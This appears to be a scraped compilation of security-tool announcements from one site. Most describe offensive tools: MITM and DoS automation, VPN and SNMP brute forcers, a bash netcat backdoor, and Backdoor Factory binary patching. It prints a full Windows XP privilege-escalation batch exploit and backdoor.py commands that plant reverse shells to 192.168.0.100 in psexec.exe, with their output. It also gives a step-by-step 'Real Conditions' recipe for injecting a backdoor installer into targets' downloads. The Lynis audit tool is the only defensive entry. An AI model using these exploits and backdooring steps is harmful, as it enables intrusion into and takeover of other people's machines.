[netool.sh V4.2]
* netool.sh => “added” INURLBR (webcrawler.php by cleiton)
* netool.sh => “added” ‘toolkit_config’ file (config settings in toolkit)
* netool.sh => “added” set variable for temp download folder (/tmp/evil)
* netool.sh => “Improved” toolkit update check function [GIT repo]
* netool.sh => “Improved” SET_AUTO_START_UPDATES (toolkit_config)
* netool.sh => “Improved” script display output [Text User Interface]
* netool.sh => “removed” dd0s javascript attack (ubuntuone website)
* priv8.sh => “added” ‘host a file attack’ automated exploit
* priv8.sh => “added” meterpreter powershell invocation payload [by R3L1K]
* priv8.sh => “Improved” script display output [Text User Interface]
* priv8.sh => “Improved” ‘webshell.php’ payload
* priv8.sh => “Improved” ‘firefox_xpi_bootstrapped_addon’
(added JavaScript AlertBox to phishing webpage).

netool.sh is a script in bash to automate frameworks like Nmap,Driftnet,SSLstrip and ettercap MITM attacks
this script makes it easy tasks such as SNIFFING, MITM, SSLsniff, retrieve metadata, and DoS attacks inside the local network can also perform TCP/UDP packets manipulation using etter.filters also as the hability of capture pictures of web-browser surfing on the target machine uneder MITM attack and preforms a vuln scan to target web-site using websecurify addon…

Features

• ping target
• Show Local Connections
• Show my Ip address
• Scan Local network
• Scan remote host
• execute Nmap command
• Open router config
• Ip tracer whois
• WebCrawler
• DDoS java Script
• Retrieve metadata
• Config ettercap
• Launch MITM
• show URLs visited
• Sniff remote pics
• Sniff SSL passwords
• Dns-Spoofing
• DoS attack {local}
• Compile etter.filters
• execute ettercap filter

d. delete lock folders
q. quit

INSTALL ON LINUX
1.extract “opensource.tar.gz” to home folder
2.execute privs:
sudo chmod +x opensource/netool.sh
sudo chmod +x opensource/sslstrip-0.9/sslstrip.py
sudo chmod +x opensource/sslstrip-0.9/setup.py
3.you need to install the follow dependencies:
sudo apt-get install nmap
sudo apt-get install zenmap
sudo apt-get install ettercap
sudo apt-get install ettercap-gtk
sudo apt-get install driftnet
{or execute the script with sudo to auto-install of dependencies}
example: sudo opensource/netool.sh
run netool.sh
sudo opensource/netool.sh

INSTALL ON BACKTRACK
1.extract “opensource.tar.gz” to home folder
2.execute privs:
chmod +x opensource/netool.sh
chmod +x opensource/sslstrip-0.9/sslstrip.py
chmod +x opensource/sslstrip-0.9/setup.py
config netool.sh
edit netool.sh script and look for the rigth path were frameworks
are installed then replace the paths for the rigth ones…
(open terminal and write “locate zenmap” copy path and replace in script)
Path to instalations
(you are going to replace the paths for the rigth ones)
find=”/usr/share/zenmap”
find2=”/usr/share/ettercap”
confE=”/etc/etter.conf”
confD=”/usr/share/ettercap/etter.dns”
confP=”/usr/share/ettercap/etter.services”
confW=”/usr/share/doc/driftnet”
run netool.sh
opensource/netool.sh

Download : opensource.tar.gz (20.1MB) Kali Linux : opensource[Kali].tar.gz (96.8kB)
Find Other Version |

Read more in here :  http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/
Our post before : http://seclist.us/update-script-bash-netool-sh-v-4-0.html

IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities. Requires the pyip, crypto and openssl modules installed, but other than that it’s only standard libs.

INSTALL:
pyip is the only non-standard lib that you won’t have, install it with ‘pip install pyip’

USAGE:
./ikeforce.py [target] [mode] -w /path-to/wordlist.txt [optional] -t 5 1 1 2
Example (enum mode):
./ikeforce.py 192.168.1.110 -e -w groupnames.txt -s 1
Example (brute mode):
./ikeforce.py 192.168.1.110 -b -i groupid -u dan -k psk123 -w groupnames.txt -s 1

Options:
-h, –help show this help message and exit
-w WORDLIST, –wordlist=WORDLIST
Path to wordlist file
-t TRANS, –trans=TRANS
[OPTIONAL] Transform set: encryption type, hash type,
authentication type, dh group (5 1 1 2)
-e, –enum Set Enumeration Mode
-b, –brute Set XAUTH Brute Force Mode
-k PSK, –psk=PSK Pre Shared Key to be used with Brute Force Mode
-i ID, –id=ID ID or group name. To be used with Brute Force Mode
-u USERNAME, –username=USERNAME
XAUTH username to be used with Brute Force Mode
-U USERLIST, –userlist=USERLIST
[OPTIONAL] XAUTH username list to be used with Brute
Force Mode
-p PASSWORD, –password=PASSWORD XAUTH password to be used with Connect Mode
–sport=SPORT Source port to use, default is 500
-d, –debug Set debug on
-c, –connect Set Connect Mode (test a connection)
-y IDTYPE, –idtype=IDTYPE
[OPTIONAL] ID Type for Identification payload. Default
is 2 (FQDN)
-s SPEED, –speed=SPEED
[OPTIONAL] Speed of guessing attempts. A numerical
value between 1 – 5 where 1 is faster and 5 is slow.
Default is 3
-l KEYLEN, –keylen=KEYLEN
[OPTIONAL] Key Length, for use with AES encryption
types
TO DO:
-add rsa, hybrid etc support
-edit the packet processing to be more specific to milestones instead of just going by the number of packets in the received box
-add RADIUS support and add exception for OTP until it’s supported
-add multiple transform sets to first packet to catch more device responses, particularly fqdn_user_id (03) and fqdn (02)
-add xauth brute force mode for watchguard devices, currently doesn’t work

Download : ikeforce-master.zip (25.7 MB) 
or clone desktop : https://github.com/SpiderLabs/ikeforce.git
Source : Spiderlabs 

Changelog v-1.6.3 :
New:
– Added tests for Shellshock bash vulnerability [SHLL-6290]
– Added test to determine if Snoopy is used [ACCT-9636]
– New test for qdaemon configuration file [PRNT-2416]
– Test for GRUB boot loader password [BOOT-5122]
– New test for qdaemon printer jobs [PRNT-2420]
– Added ClamXav test for Mac OS X [MALW-3288]
– Gentoo vulnerable packages test [PKGS-7393]
– New test for qdaemon status [PRNT-2418]
– Gentoo package listing [PKGS-7304]
– Running Lynis without root permissions will start non-privileged scan
– Systemd service and timer example file added
– Added grub2-install to binaries

Changes:
– Adjustments so insecure SSL protocols are detected in nginx config [HTTP-6710]
– Directories will be skipped when searching for nginx log files [HTTP-6720]
– Only gather unique name servers from /etc/resolv.conf [NAME-2704]
– Properly detect mod_evasive on Gentoo and others [HTTP-6640]
– Improved swap partition detection in /etc/fstab [FILE-6336]
– Improvements to kernel detection (e.g. Gentoo) [KRNL-5830]
– Test for built-in security options in YUM [PKGS-7386]
– Improved boot loader detection for GRUB2 [BOOT-5121]
– Split GRUB test into two tests [BOOT-5122]
– Added Mac OS uptime check [BOOT-5202]
– Improved GetHostID function for systems having only ip binary
– Improved testing for symlinked binary directories
– Minor adjustments to log output
– Renamed dev directory to extras

Lynis is a system and security auditing tool for Unix/Linux. Main audience of this tool is security consultants, auditors and system administrators. This tool performs a security audit of the system and determines how well it is hardened. Any detected security issues will be provided in the form of a suggestion or warning at the end of the audit. Beside security related information it will also scan for general system information, installed packages and possible configuration errors. This software aims in assisting automated auditing, hardening, software patch management, vulnerability and malware scanning of Unix/Linux based systems. It can be run without prior installation, so inclusion on read only storage is possible (USB stick, cd/dvd).
Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOx (Sarbanes-Oxley) compliance audits, by automation of control testing.

Features :

• System auditing
  Hardening suggestions
  Security scan
  Vulnerability scan

Download Latest Version : lynis-1.6.3.tar.gz (169.9 kB) 
Source : http://cisofy.com/
Our Post Before : http://seclist.us/lynis-v-1-5-9-released-is-a-system-and-security-auditing-tool-for-unixlinux.html

Changelog netool.sh v-4.3:
* INSTALL.sh => “added” installer of netool.sh toolkit
* netool.sh => “improved” running scanner inurlbr.php from toolkit
* netool.sh => “improved” better displays and small bugs fixed
* netool.sh => “added” MIGRATE_TO:wininit.exe “toolkit_config file” Using the option ‘post-exploitation’ in rootsector module, we now have                                   the ability to chose a proccess to migrate.
* priv8.sh => “improved” generate shellcode “new output -> shellcode.txt”
* priv8.sh => “Improved” host a file attack “added fake java update webpage”
* priv8.sh => “Improved” host a file attack “added fake missing plugin webpage”
* priv8.sh => “Improved” Website keylooger “no need to edit index.html”
* priv8.sh => “Improved” Clone WebSite > browser_autopwn “no need to edit index.html”
* priv8.sh => “Improved” Clone website > java_applet “no need to edit index.html”
* priv8.sh => “Improved” backdooring EXE files “keep template working” keep template working (executable) OR just use the icon (.ico) of the executable to be displayed in backdoor.exe generated.

netool.sh is a script in bash to automate frameworks like Nmap,Driftnet,SSLstrip and ettercap MITM attacks
this script makes it easy tasks such as SNIFFING, MITM, SSLsniff, retrieve metadata, and DoS attacks inside the local network can also perform TCP/UDP packets manipulation using etter.filters also as the hability of capture pictures of web-browser surfing on the target machine uneder MITM attack and preforms a vuln scan to target web-site using websecurify addon…

Features:

• ping target
• Show Local Connections
• Show my Ip address
• Scan Local network
• Scan remote host
• execute Nmap command
• Open router config
• Ip tracer whois
• WebCrawler
• DDoS java Script
• Retrieve metadata
• Config ettercap
• Launch MITM
• show URLs visited
• Sniff remote pics
• Sniff SSL passwords
• Dns-Spoofing
• DoS attack {local}
• Compile etter.filters
• execute ettercap filter

d. delete lock folders
q. quit

INSTALL ON LINUX
1.extract “opensource.tar.gz” to home folder
2.execute privs:
sudo chmod +x opensource/netool.sh
sudo chmod +x opensource/sslstrip-0.9/sslstrip.py
sudo chmod +x opensource/sslstrip-0.9/setup.py
3.you need to install the follow dependencies:
sudo apt-get install nmap
sudo apt-get install zenmap
sudo apt-get install ettercap
sudo apt-get install ettercap-gtk
sudo apt-get install driftnet
{or execute the script with sudo to auto-install of dependencies}
example: sudo opensource/netool.sh
run netool.sh
sudo opensource/netool.sh

INSTALL ON BACKTRACK
1.extract “opensource.tar.gz” to home folder
2.execute privs:
chmod +x opensource/netool.sh
chmod +x opensource/sslstrip-0.9/sslstrip.py
chmod +x opensource/sslstrip-0.9/setup.py
config netool.sh
edit netool.sh script and look for the rigth path were frameworks
are installed then replace the paths for the rigth ones…
(open terminal and write “locate zenmap” copy path and replace in script)
Path to instalations
(you are going to replace the paths for the rigth ones)
find=”/usr/share/zenmap”
find2=”/usr/share/ettercap”
confE=”/etc/etter.conf”
confD=”/usr/share/ettercap/etter.dns”
confP=”/usr/share/ettercap/etter.services”
confW=”/usr/share/doc/driftnet”
run netool.sh
opensource/netool.sh

Download : opensource.tar.gz (20.1MB) Kali Linux : opensource[Kali].tar.gz (20.1 MB)
Find Other Version |

Read more in here :  http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/
Our post before : http://seclist.us/update-script-bash-netool-sh-stable-version-4-2.html

changelog v-1.6.4 :
New:
– Boot loader detection for AIX [BOOT-5102]
– Detection of getcap and lsvg binary
– Added filesystem_ext to report
– Detect rootsh
Changes:
– Hide errors when RPM database is faulty and show suggestion instead [PKGS-7308]
– Allow OpenBSD to gather information on listening network ports [NETW-3012]
– Don’t trigger warning for Shellshock when doing segfault test [SHLL-6290]
– Do not run Apache test on OpenBSD and strip control chars [HTTP-6624]
– Extended AIDE test with configuration validation test [FIND-4314]
– Improved Shellshock test regarding non-Linux support [SHLL-6290]
– Added support for gathering volume groups on AIX [FILE-6311]
– Properly parse PAM lines and add them to report [AUTH-9264]
– Support for boot loader detection on OpenBSD [BOOT-5159]
– Added uptime detection for OpenBSD systems [BOOT-5202]
– Support for volume groups on AIX [FILE-6312]
– Redirect errors when searching for readlink binary

Lynis is a system and security auditing tool for Unix/Linux. Main audience of this tool is security consultants, auditors and system administrators. This tool performs a security audit of the system and determines how well it is hardened. Any detected security issues will be provided in the form of a suggestion or warning at the end of the audit. Beside security related information it will also scan for general system information, installed packages and possible configuration errors. This software aims in assisting automated auditing, hardening, software patch management, vulnerability and malware scanning of Unix/Linux based systems. It can be run without prior installation, so inclusion on read only storage is possible (USB stick, cd/dvd).
Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOx (Sarbanes-Oxley) compliance audits, by automation of control testing.

Features :
+ System auditing
+ Hardening suggestions
+ Security scan
+ Vulnerability scan

Download : lynis-1.6.4.tar.gz (172.0 kB)
Source : https://cisofy.com/
Our Post Before : http://seclist.us/updates-lynis-v-1-6-3-is-a-system-and-security-auditing-tool-for-unixlinux.html

Windows XP Local Privilege Escalation Exploit. 

0101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101
0    ▄██████▄     ▄█    █▄     ▄██████▄     ▄████████     ███     ▄██   ▄                    0
1   ███    ███   ███    ███   ███    ███   ███    ███ ▀█████████▄ ███   ██▄                  1
0   ███    █▀    ███    ███   ███    ███   ███    █▀     ▀███▀▀██ ███▄▄▄███                  0
1  ▄███         ▄███▄▄▄▄███▄▄ ███    ███   ███            ███   ▀ ▀▀▀▀▀▀███                  1
0 ▀▀███ ████▄  ▀▀███▀▀▀▀███▀  ███    ███ ▀███████████     ███     ▄██   ███                  0
1   ███    ███   ███    ███   ███    ███          ███     ███     ███   ███                  1
0   ███    ███   ███    ███   ███    ███    ▄█    ███     ███     ███   ███                  0
1   ████████▀    ███    █▀     ▀██████▀   ▄████████▀     ▄████▀    ▀█████▀                   1
0                               im Gh0sty member Of 1337Day Algeria                          0
1--------------------------------------------------------------------------------------------0
0 Title           :  Windows XP Local Privilege Escalation Exploit                           1
1 Discovrer       :  Ghosty (0x9h027)                                                        0
0 Email           :  x31337666[at]gmail[dot]com                                              1
1 Facebook        :  https://facebook.com/0x9h027  (Subscribe Or PM me Only)                 0
0 Home            :  Algeria 16023 ( Alger - Hydra )                                         1
1 Category        :  Proof Of Concept                                                        0
0 Tested    :  Windows XP SP1 , SP2 (FRENSH)                                                 1
1010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
// BATCH SCRIPT START HERE

@echo off
title Windows XP Local Privilege Escalation Exploit
color 0a
cls
cd / && cd windows/system32/
mkdir ghosty && copy logon.scr ghosty\logon.scr && copy cmd.exe ghosty\cmd.exe
del logon.scr && rename cmd.exe logon.scr
echo.
echo.
echo Activate Screensaver and wait for it
echo an Unprotected dos prompt will appear 
:: Gh0sty Grrr --- F-ck h4ck!n Luv 3xpl0!ting --- <3 <3 <3
:: short explaination
:: so in this script we backup the cmd.exe(COMMAND PROMPT) & logon.src(SCREENSAVER)
:: then we delete logon.scr and rename cmd.exe to logon.scr 
:: we set screensaver and wait for it the system (NT/AUTORITE) will look for screen saver file (logon.scr) but its cmd.exe
:: so he will execute cmd.exe with higher privilege :) so we can use this to get the administrator account 
:: ex:  net user [ADMIN_HERE] [PASS_HERE]

//SCRIPT END
	
ping~########################################################################################\
inject0rTEAM-ExploitiD-ExploitDB-an0nghost-an0nsec-an0nDZ-DZMAFIA-TEAM152                    #
Caddy-Tr0ooN-KedAnZ-KingOfPirates-backoverDZ-cc0de-foundZ-kha&m!x-El!teTr0jan                #
#############################################################################################/
#EOF

Source : http://pastebin.com/SBXFFaY6

NOTICE : For security professionals and researchers only.
This script rides on two libraries for usage: The Backdoor Factory (BDF) and the mitmProxy.
Concept:
Patch binaries during download ala MITM.
Why:
Because a lot of security tool websites still serve binaries via non-SSL/TLS means.
Here’s a short list:

sysinternals.com
Microsoft - MS Security Essentials
Almost all anti-virus companies
Malwarebytes
Sourceforge
gpg4win
Wireshark
etc...

+ Supported Environment:

Tested on all Kali Linux builds, whether a physical beefy laptop, a Raspberry Pi, or a VM, each can run BDFProxy.

Install:
BDF is in bdf/
Run the following to pull down the most recent:

./install.sh

OR:

git clone https://github.com/secretsquirrel/the-backdoor-factory bdf/
If you get a certificate error, run the following:

mitmproxy
And exit [Ctr+C] after mitmProxy loads.

Usage:

Update everything before each use:

./update.sh

 READ THE CONFIG!!!

-->bdfproxy.cfg

You will need to configure your C2 host and port settings before running BDFProxy. DO NOT overlap C2 PORT settings between different payloads. You’ll be sending linux shells to windows machines and things will be segfaulting all over the place. After running, there will be a metasploit resource script created to help with setting up your C2 communications. Check it carefully. By the way, everything outside the [Overall] section updates on the fly, so you don’t have to kill your proxy to change settings to work with your environment.

But wait! You will need to configure your mitm machine for mitm-ing! If you are using a wifiPineapple I modded a script put out by hack5 to help you with configuration. Run ./wpBDF.sh and enter in the correct configs for your environment. This script configures iptables to push only http (non-ssl) traffic through the proxy. All other traffic is fowarded normally.

Then:

./bdf_proxy.py

Here’s some sweet ascii art for possible phyiscal settings of the proxy:
Lan usage:

<Internet>----<mitmMachine>----<userLan>

WIFI Usage :

<Internet>----<mitmMachine>----<wifiPineapple>))

 Testing : 

Suppose you want to use your browser with Firefox and FoxyProxy to connect to test your setup.

    Update your config as follows:
    transparentProxy = False

    Configure FoxyProxy to use BDFProxy as a proxy.
    Default port in the config is 8080.

+ Logging:

We have it. The proxy window will quickly fill with massive amounts of cat links depending on the client you are testing. Use tail -f proxy.log to see what is getting patched and blocked by your blacklist settings. However, keep an eye on the main proxy window if you have chosen to patch binaries manually, things move fast and behind the scences there is multi-threading of traffic, but the intial requests and responses are locking for your viewing pleasure.

+ Attack Scenarios (all with permission of targets):
-Evil Wifi AP
-Arp Redirection
-Physical plant in a wiring closet
-Logical plant at your favorite ISP

Download version :
0.2.tar.gz (14 KB)
0.2.zip (14 KB) 

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr

NOTICE: For security professionals and researchers only.
Changelog 12/17/2014:
– OS X Beaconing Payloads for x86 and x64: beaconing_reverse_shell_tcp
-B 15 –> set beacon time for 15 secs
– Bug fix to support OS X for BDFProxy

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

Features:
+ PE Files
+ ELF Files
+ Mach-O Files
+ Overall

Dependences:
Capstone, using the ‘next’ repo until it is the ‘master’ repo: https://github.com/aquynh/capstone/tree/next
Pefile, most recent: https://code.google.com/p/pefile/ 

INSTALL:
./install.sh

This will install Capstone with the ‘next’ repo and use pip to install pefile.

UPDATE:
./update.sh

Documentation and Presentation:
– http://www.slideshare.net/midnite_runr/patching-windows-executables-with-the-backdoor-factory
– http://www.youtube.com/watch?v=LjUN9MACaTs

Sample Usage:
Patch an exe/dll using an existing code cave:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp 

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 402
[*] All caves lengths:  (402,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 402
[*] Available caves:
1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507
2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492
3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501
4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492
5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505
6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498
7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495
8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505
9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559
10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559
**************************************************
[!] Enter your selection: 5
Using selection: 5
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch an exe/dll by adding a code section:

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a 
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Creating Code Cave
- Adding a new section to the exe/dll for shellcode injection
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

Patch a directory of exes:

./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a
...output too long for README...

User supplied shellcode:

msfpayload windows/exec CMD='calc.exe' R > calc.bin
./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.

Hunt and backdoor: Injector | Windows Only

The injector module will look for target executables to backdoor on disk.  It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.  
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.

./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow

Download :

the-backdoor-factory-2.3.2.tar.gz (55 KB)
the-backdoor-factory-2.3.2.zip (74 KB) 

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr
Source : https://github.com/secretsquirrel/the-backdoor-factory

NOTICE: For security professionals and researchers only.

changelog v-20.12.2014 :
+ Added more Nessus mappings.
+ Updated Burp notes.
+ new bash Script

Formerly BackTrack scripts. For use with Kali Linux. Custom bash scripts used to automate various pentesting tasks.
Features :
– sslscan and sslyze to check for SSL/TLS certificate issues.
– Passive combines goofile, goog-mail, goohost, theHarvester, Metasploit, dnsrecon, URLCrazy, Whois and multiple webistes.
– Active combines Nmap, dnsrecon, Fierce, lbd, WAF00W, traceroute and Whatweb.
– Crack wireless networks.
– Parse XML to CSV,
– Scanning CIDR, List, IP or domain.

Download, setup & usage :
If using Kali mini apt-get install windows-binaries
git clone git://github.com/leebaird/discover.git /opt/discover/
All scripts must be ran from this location.
cd /opt/discover/
./setup.sh
./discover.sh
Source : https://github.com/leebaird
our post : http://seclist.us/update-discover-v-22-9-14-formally-backtrack-scripts-for-use-with-kali-linux-custom-bash-scripts-used-to-automate-various-pentesting-tasks.html

Unix remote-shell backdoor develop with Bash, Netcat, OpenSSL (data encryption with AES-128bit)

The main goals of this project is to implement an attack scenario as below :
+ Implement backdoor like remote-shell with Bash
+ Attack Man In the middle with Ettercap (like ARP Spoofing)
+ Hosting a backdoor installer
+ Automate data alteration to inject our backdoor inside the computer of target by a browser
If the target run (naively) the script (ie: the backdoor installer) without reading code source the computer is infected and the attacker can obtain a remote access command
Detect and prevent this kind of attack with NIDS tool as Snort

Notice :
– The programming language was choose only for a Proof of Concept (POC)
– The socket layer is assumed by a portable version of Netcat. I compiled Netcat for i686 and x86_64 computer architecture a put the binary inside this project.
– The transmited data were encrypted with AES-128 (without using Cryptocat). The data are encrypted on the fly via OpenSSL.

Requirements:
– openssl (tested with v1.0.1j)
– ettercap (>= v0.8.1)
– etterfilter (>= v0.8.1)
– etterfilter (>= v0.8.1)
– netcat (The compiled version is “The GNU Netcat” v0.7.1)

– How it work ?
The backdoor-client connection work localy and remontly (inside same private network with the same access-point), ie : see “$HOST” inside “config.sh”.

It work only on Unix OS. Currently, tested only on :
– Archlinux
– Debian 7
– Ubuntu 14.10

Sample Test : 

git clone git@github.com:pilebones/backdoorBash.git
cd backdoorBash
cp config.sh.sample config.sh 
vim config.sh
./server.sh
./client.sh

Download :

etterfilterSamples : Master.zip  | or Clone Url 

Backdoor bash : Master.zip  | or Clone Url
Source : https://github.com/pilebones

SNMP brute force, enumeration, CISCO config downloader and password cracking script. Listens for any responses to the brute force community strings, effectively minimising wait time.

Features:
+ Brute forces both version 1 and version 2c SNMP community strings
+ Enumerates information for CISCO devices or if specified for Linux and Windows operating systems.
+ Identifies RW community strings
+ Tries to download the router config (metasploit module).
+ If the CISCO config file is downloaded, shows the plaintext passwords (metasploit module) and tries to crack hashed passords with John the Ripper

Requirements :
– metasploit
– snmpwalk
– snmpstat
– john the ripper

Usage :
python snmp-brute.py -t [IP]

Options :
–help, -h show this help message and exit
–file=DICTIONARY, -f DICTIONARY Dictionary file
–target=IP, -t IP Host IP
–port=PORT, -p PORT SNMP port

Advanced :
–rate=RATE, -r RATE Send rate
–timeout=TIMEOUT Wait time for UDP response (in seconds)
–delay=DELAY Wait time after all packets are send (in seconds)
–iplist=LFILE IP list file
–verbose, -v Verbose output

Automation :
–bruteonly, -b Do not try to enumerate – only bruteforce
–auto, -a Non Interactive Mode
–no-colours No colour output

Operating Systems :
–windows Enumerate Windows OIDs (snmpenum.pl)
–linux Enumerate Linux OIDs (snmpenum.pl)
–cisco Append extra Cisco OIDs (snmpenum.pl)

Download : Master.zip  | Clone Url 
Source : https://github.com/SECFORCE

Changeslog:
+ Fix: accept remote connection from netcat
+ Dispatch des outputs dans les bon logs selon client ou serveur
+ Fix: accept remote connection from netcat

Unix remote-shell backdoor develop with Bash, Netcat, OpenSSL (data encryption with AES-128bit)

The main goals of this project is to implement an attack scenario as below :
+ Implement backdoor like remote-shell with Bash
+ Attack Man In the middle with Ettercap (like ARP Spoofing)
+ Hosting a backdoor installer
+ Automate data alteration to inject our backdoor inside the computer of target by a browser
If the target run (naively) the script (ie: the backdoor installer) without reading code source the computer is infected and the attacker can obtain a remote access command
Detect and prevent this kind of attack with NIDS tool as Snort

Notice :
– The programming language was choose only for a Proof of Concept (POC)
– The socket layer is assumed by a portable version of Netcat. I compiled Netcat for i686 and x86_64 computer architecture a put the binary inside this project.
– The transmited data were encrypted with AES-128 (without using Cryptocat). The data are encrypted on the fly via OpenSSL.

Requirements:
– openssl (tested with v1.0.1j)
– ettercap (>= v0.8.1)
– etterfilter (>= v0.8.1)
– etterfilter (>= v0.8.1)
– netcat (The compiled version is “The GNU Netcat” v0.7.1)

– How it work ?
The backdoor-client connection work localy and remontly (inside same private network with the same access-point), ie : see “$HOST” inside “config.sh”.

It work only on Unix OS. Currently, tested only on :
– Archlinux
– Debian 7
– Ubuntu 14.10

Sample Test : 

git clone git@github.com:pilebones/backdoorBash.git
cd backdoorBash
cp config.sh.sample config.sh 
vim config.sh
./server.sh
./client.sh

Real Conditions:

git clone git@github.com:pilebones/backdoorBash.git
git clone git@github.com:pilebones/etterfilterSamples.git
git clone git@github.com:pilebones/hostingBackdoorInstaller.git
cp backdoorBash/config.sh.sample backdoorBash/config.sh
vim backdoorBash/config.sh
# For export remove client.sh *.log config.sh.sample
tar xvzf hostingBackdoorInstaller/export.tar.gz backdoorBash/
# Configure your vhost to hosting hostingBackdoorInstaller's project
cd etterfilterSamples/inject_backdoor_installer/
# Update Redirect URL from "fake-http-redirect.txt"
vim fake-http-redirect.txt
IFACE=wlanX IP_AP=192.168.0.1 IP_TARGET=192.168.0.x ./run
# From target try to download a shell script like "test.sh" or try with 404 Not Found page (same behavior => inject backdoor installer)
# From target : "chmod +x bd_installer.sh && ./bd_installer.sh"
HOST=192.168.0.x ./client.sh

Download :

etterfilterSamples : Master.zip  | or Clone Url 

Backdoor bash : Master.zip  | or Clone Url
Source : https://github.com/pilebones | our post before

Update 09.02.2015 : – LinEnum.sh: A script to enumerate local information from a Linux host

LinEnum will automate many of the checks that I’ve documented in the Local Linux Enumeration & Privilege Escalation Cheatsheet. It’s a very basic shell script that performs over 65 checks, getting anything from kernel information to locating possible escalation points such as potentially useful SUID/GUID files and Sudo/rhost mis-configurations and more.

LinEnum : Scripted Local Linux Enumeration & Privilege Escalation Checks

High-level summary of the checks/tasks performed by LinEnum:
+ Kernel and distribution release details
System Information:
+ Hostname
Networking details:
+ Current IP
+ Default route details
+ DNS server information
User Information:
+ Current user details
+ Last logged on users
+ List all users including uid/gid information
+ List root accounts
+ Extracts password policies and hash storage method information
+ Checks umask value
+ Checks if password hashes are stored in /etc/passwd
+ Extract full details for ‘default’ uid’s such as 0, 1000, 1001 etc
+ Attempt to read restricted files i.e. /etc/shadow
+ List current users history files (i.e .bash_history, .nano_history etc.)
+ Basic SSH checks
Privileged access:
+ Determine if /etc/sudoers is accessible
+ Determine if the current user has Sudo access without a password
+ Are known ‘good’ breakout binaries available via Sudo (i.e. nmap, vim etc.)
+ Is root’s home directory accessible
+ List permissions for /home/
Environmental:
+ Display current $PATH
Jobs/Tasks:
+ List all cron jobs
+ Locate all world-writable cron jobs
+ Locate cron jobs owned by other users of the system
Services:
+ List network connections (TCP & UDP)
+ List running processes
+ Lookup and list process binaries and associated permissions
+ List inetd.conf/xined.conf contents and associated binary file permissions
+ List init.d binary permissions
Version Information (of the following):
+ Sudo
+ MYSQL
+ Postgres
+ Apache
+ Checks user config
Default/Weak Credentials:
+ Checks for default/weak Postgres accounts
+ Checks for default/weak MYSQL accounts
Searches:
+ Locate all SUID/GUID files
+ Locate all world-writable SUID/GUID files
+ Locate all SUID/GUID files owned by root
+ Locate ‘interesting’ SUID/GUID files (i.e. nmap, vim etc)
+ List all world-writable files
+ Find/list all accessible *.plan files and display contents
+ Find/list all accessible *.rhosts files and display contents
+ Show NFS server details
+ Locate *.conf and *.log files containing keyword supplied at script runtime
+ List all *.conf files located in /etc
+ Locate mail

Download : Master.zip  | Clone
Source: http://www.rebootuser.com/

Changelog v-4.4:
* netool.sh => “improved” added zenity “Displays”
* netool.sh => “improved” nmap scanner menu “Redesign/Improved”
* netool.sh => “improved” scan WAN for hosts “port nmap.xml to msf db ”
* netool.sh => “added” access t00lkit database “store scans or notes”
* netool.sh => “added” CLEAN_LOGS:YES “toolkit_config”
* netool.sh => “added” CLEAN_HANDLERS:NO “toolkit_config”
* netool.sh => “added” CLEAN_DATABASE:NO “toolkit_config”
* priv8.sh => “improved” all listenners “post-exploitation module added”
* priv8.sh => “added” handler.rc “store listenner settings”
* priv8.sh => “added” C-Injector “Inject shellcode using C”
* priv8.sh => “added” 3 new multi-handlers “listenners”
“‘Default Listenner, Post-auto.rc, AutoRunScript, Resource_files'”
